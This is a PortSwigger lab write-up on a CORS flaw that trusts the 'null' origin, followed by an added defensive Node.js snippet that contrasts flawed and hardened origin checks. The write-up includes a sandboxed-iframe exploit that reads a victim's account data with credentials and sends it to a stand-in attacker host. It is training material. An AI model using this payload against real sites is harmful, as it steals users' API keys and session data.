Portswiggers lab write up: CORS vulnerability with trusted null origin
In this apprentice-level lab, we will exploit a website with a CORS vulnerability that trusts the "null" origin to obtain a user's private credentials.
Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to /accountDetails that fetches the user's API key:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{ "username": "wiener", "email": "", "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW", "sessions": [ "cdmflpOO6psYIp3novWUytbSDM9i68X1" ] }
We can see that the Access-Control-Allow-Credentials: true header is present. Let's duplicate this request and change the Origin header to something like Origin: https://example.com to see whether that value is reflected. The response will be something like this:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{ "username": "wiener", "email": "", "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW", "sessions": [ "cdmflpOO6psYIp3novWUytbSDM9i68X1" ] }
The Origin set in the request headers is not reflected in an Access-Control-Allow-Origin response header. This could mean that the server does not have CORS vulnerabilities, but before concluding that, let's try setting the Origin header to null:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{ "username": "wiener", "email": "", "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW", "sessions": [ "cdmflpOO6psYIp3novWUytbSDM9i68X1" ] }
The null Origin set in the request headers is now reflected in the Access-Control-Allow-Origin response header, together with Access-Control-Allow-Credentials: true. This confirms that this endpoint has a CORS vulnerability via the null origin. Let's use the reading material's sandboxed iframe template to craft our exploit, so that the browser sends the request with the Origin header set to null:
<html>
<!-- A sandboxed iframe without allow-same-origin gets an opaque origin,
     so the browser sends "Origin: null" with the credentialed request. -->
<iframe sandbox='allow-scripts allow-top-navigation allow-forms' src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();
function reqListener() {
  location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
</html>
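As an added example that is not part of the original write-up or of the PortSwigger lab, the snippet below shows the defender's side of the three probes above: a server-side origin check in the flawed form that trusts the null origin, the hardened form that only echoes exact allowlisted origins, and a small checker that flags a response carrying Access-Control-Allow-Origin: null together with Access-Control-Allow-Credentials: true. It runs under Node.js; the trusted origin https://vulnerable-website.com and the two sample responses are constructed for the example.

```javascript
// Added example (not from the lab or the original post). All names and
// sample data below are constructed for illustration.

// Assumed allowlist of origins that may make credentialed requests.
const TRUSTED = new Set(["https://vulnerable-website.com"]);

// Flawed policy: accepts exact allowlist matches AND the literal "null"
// origin. Sandboxed iframes, data: URLs and file:// pages all send
// Origin: null, so with credentials this is effectively an open allowlist.
function corsHeadersFlawed(origin) {
  if (origin === "null" || TRUSTED.has(origin)) {
    return {
      "Access-Control-Allow-Origin": origin,
      "Access-Control-Allow-Credentials": "true",
    };
  }
  return {};
}

// Hardened policy: only exact, fully qualified origins from the allowlist
// are echoed, "null" is never accepted, and Vary: Origin stops a shared
// cache from serving one origin's CORS headers to another.
function corsHeadersHardened(origin) {
  if (typeof origin === "string" && origin !== "null" && TRUSTED.has(origin)) {
    return {
      "Access-Control-Allow-Origin": origin,
      "Access-Control-Allow-Credentials": "true",
      "Vary": "Origin",
    };
  }
  return {};
}

// Parse a raw HTTP response (status line, headers, blank line, body) into
// a map of lowercase header names to values. The body is ignored.
function parseHeaders(raw) {
  const head = raw.split(/\r?\n\r?\n/)[0];
  const headers = {};
  for (const line of head.split(/\r?\n/).slice(1)) {
    const i = line.indexOf(":");
    if (i > 0) {
      headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
    }
  }
  return headers;
}

// Flag the combination the lab relies on: credentials allowed while the
// null origin is granted access.
function isCredentialedNullOrigin(raw) {
  const h = parseHeaders(raw);
  return h["access-control-allow-credentials"] === "true" &&
         h["access-control-allow-origin"] === "null";
}

// Constructed sample mirroring the "Origin: null" probe above.
const SAMPLE_NULL = [
  "HTTP/1.1 200 OK",
  "Access-Control-Allow-Origin: null",
  "Access-Control-Allow-Credentials: true",
  "Content-Type: application/json; charset=utf-8",
  "",
  '{ "username": "wiener", "apikey": "REDACTED" }',
].join("\r\n");

// Constructed sample mirroring the "Origin: https://example.com" probe,
// where no Access-Control-Allow-Origin header came back.
const SAMPLE_FOREIGN = [
  "HTTP/1.1 200 OK",
  "Access-Control-Allow-Credentials: true",
  "Content-Type: application/json; charset=utf-8",
  "",
  '{ "username": "wiener", "apikey": "REDACTED" }',
].join("\r\n");

// Stand-alone run: show each policy's answer for the three probed origins
// and the checker's verdict on both samples.
for (const origin of ["https://vulnerable-website.com", "https://example.com", "null"]) {
  console.log(origin, "flawed:", corsHeadersFlawed(origin), "hardened:", corsHeadersHardened(origin));
}
console.log("null-origin sample flagged:", isCredentialedNullOrigin(SAMPLE_NULL));
console.log("foreign-origin sample flagged:", isCredentialedNullOrigin(SAMPLE_FOREIGN));
```

The hardened policy never reflects the request's Origin unless it matches the allowlist exactly, which also rules out the prefix and suffix tricks that regex-based checks tend to get wrong; if unauthenticated cross-origin access is genuinely needed, serve it from a separate endpoint without Access-Control-Allow-Credentials.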
Check out this write up on the Art Of Code: https://artofcode.tech/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin/
Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-trusted-null-origin
Original Link: https://dev.to/christianpaez/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin-4g9c